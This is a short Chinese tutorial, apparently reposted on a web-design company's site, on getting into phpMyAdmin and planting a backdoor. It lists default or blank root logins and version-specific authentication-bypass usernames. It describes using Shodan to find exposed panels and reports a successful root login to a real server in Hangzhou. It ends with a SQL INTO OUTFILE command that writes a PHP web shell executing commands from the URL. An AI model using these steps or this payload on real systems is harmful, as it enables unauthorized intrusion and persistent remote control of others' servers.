本篇文章給大家分享的是有關(guān)使用phpMyAdmin怎么通過密碼漏洞留后門文件,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
為宜州等地區(qū)用戶提供了全套網(wǎng)頁設(shè)計制作服務(wù),及宜州網(wǎng)站建設(shè)行業(yè)解決方案。主營業(yè)務(wù)為成都網(wǎng)站制作、做網(wǎng)站、外貿(mào)營銷網(wǎng)站建設(shè)、宜州網(wǎng)站設(shè)計,以傳統(tǒng)方式定制建設(shè)網(wǎng)站,并提供域名空間備案等一條龍服務(wù),秉承以專業(yè)、用心的態(tài)度為用戶提供真誠的服務(wù)。我們深信只要達到每一位用戶的要求,就會得到認可,從而選擇與我們長期合作。這樣,我們也可以走得更遠!默認 phpMyAdmin:用戶名 root 密碼 root 或空登陸。
版本 2.11.3~2.11.4:用戶名'localhost'@'@"
登陸,無需密碼。
版本 2.11.9.2:用戶名root
登陸,無需密碼。
經(jīng)測試,第二個漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。
下面讓我們簡單的上網(wǎng)看看能不能找到一些存在這樣漏洞的登陸頁面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin
先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個國內(nèi)的(浙江省·杭州市)。
地址已手動打碼。
http://121.***.*.219:80/
登陸成功(root 權(quán)限)。
接下來你可以寫一個 outfile 到對方主機的網(wǎng)絡(luò)目錄下。俗稱 “留后門”。
SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"
以上就是使用phpMyAdmin怎么通過密碼漏洞留后門文件,小編相信有部分知識點可能是我們?nèi)粘9ぷ鲿姷交蛴玫降摹OM隳芡ㄟ^這篇文章學到更多知識。更多詳情敬請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。
網(wǎng)站題目:使用phpMyAdmin怎么通過密碼漏洞留后門文件-創(chuàng)新互聯(lián)
文章出自:http://jinyejixie.com/article34/pgcse.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供定制網(wǎng)站、面包屑導航、標簽優(yōu)化、手機網(wǎng)站建設(shè)、域名注冊、網(wǎng)站維護
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容